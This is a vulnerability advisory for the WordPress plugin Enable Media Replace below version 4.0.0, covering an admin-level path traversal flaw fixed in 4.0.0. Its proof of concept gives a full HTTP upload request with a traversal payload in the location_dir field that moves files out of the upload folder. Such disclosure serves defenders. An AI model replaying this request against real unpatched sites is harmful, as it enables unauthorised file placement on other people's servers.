WordPress Plugin Vulnerabilities
Enable Media Replace < 4.0.0 - Admin+ Path Traversal
Description
The plugin does not ensure that renamed files are moved to the Upload folder, which could allow high privilege users such as admin to move them outside to the web root directory via a path traversal attack for example
Proof of Concept
When replacing the file, select "Replace the file, use new file name and update all links" and tick "Put new Upload in Updated Folder:" then put the payload in this setting: 2022/07/../../../../../ POST /wp-admin/upload.php?page=enable-media-replace%2Fenable-media-replace.php&action=media_replace_upload&attachment_id=5882&_wpnonce=7a3549cbce&noheader=1 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------160389504219271480051605192775 Content-Length: 1370 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="ID" 5882 -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="userfile"; filename="a.txt" Content-Type: text/plain Test file -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="replace_type" replace_and_search -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="timestamp_replace" 2 -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="custom_date" July 27, 2022 -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="custom_hour" 13 -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="custom_minute" 43 -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="custom_date_formatted" 2022-07-27 -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="new_location" 1 -----------------------------160389504219271480051605192775 Content-Disposition: form-data; name="location_dir" 2022/07/../../../../../ -----------------------------160389504219271480051605192775-- The file will be moved to the parent folder of the blog
Affects Plugins
Fixed in version 4.0.0
References
Classification
Miscellaneous
Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-09-14 (about 8 months ago)
Added
2022-09-14 (about 8 months ago)
Last Updated
2022-09-14 (about 8 months ago)